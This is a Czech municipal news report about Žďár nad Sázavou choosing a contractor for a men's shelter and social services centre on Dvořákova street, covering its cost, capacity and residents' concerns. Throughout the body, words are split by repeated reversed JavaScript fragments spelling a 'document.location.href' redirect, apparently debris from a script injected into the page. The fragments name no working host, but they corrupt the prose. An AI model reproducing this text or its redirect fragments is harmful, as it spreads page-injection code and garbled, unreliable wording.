Rainbow page separator

Žďár vybral firmu, která postaví azylový dům v Dvořákově ulici

Čtvrtek, 3. června 2021

Městský úřad Žďár nad Sázavou

Žďár nad Sázavou / Dodavatelskou firmu, která postaví centrum sociálních služeb v Dvořákově ulici, schválili žďárští radní. Objekt na pozemku města vyjde na 19,8 milionu korun bez DPH. Stavět se začne le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos, přičemž v aktuálním rozpočtu je na akci vyčleněno pět milionů korun. Další peníze na předfinancování stavby, kterou má podpořit evropská dotace, poputují z rozpočtu města na rok 2022, kdy má být centrum dostavěno. Mimo vysoutěženou cenu bude v průběhu výstavby vyhlášena ještě soutěž na vnitřní vybavení objektu a rekonstrukci veřejného osvětlení včetně kamerového systému v Dvořákově ulici.
Novostavba, jež nahradí azylový dům pro muže ve Žďáře nad Sázavou 3, zahrne zděnou uby[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovnu pro dvacet mužů a noclehárnu s kapaci[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou šesti lidí k příleži[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tostnému přespání. Chybět nebude sociální zařízení, společenská místnost, kuchyňka i zázemí pro personál.
Se stavbou žďárská radnice počítala několik let, původně mělo být centrum vybudováno v rámci strategického plánu sociálního začleňování pro období 2016 – 2019. Už při představení záměru projevili obyvatelé Dvořákovy ulice obavu z dalšího zvýšení počtu problémových osob v lokalitě a požádali radnici o zvážení umístění centra jinam. Vhodnější mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to ale měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to nenašlo. Obyvatelům bylo nicméně přislíbeno, že s centrem v řídce osídlené ulici naopak dojde k vyšší míře bezpečí, což má zajistit i nový bod kamerového systému.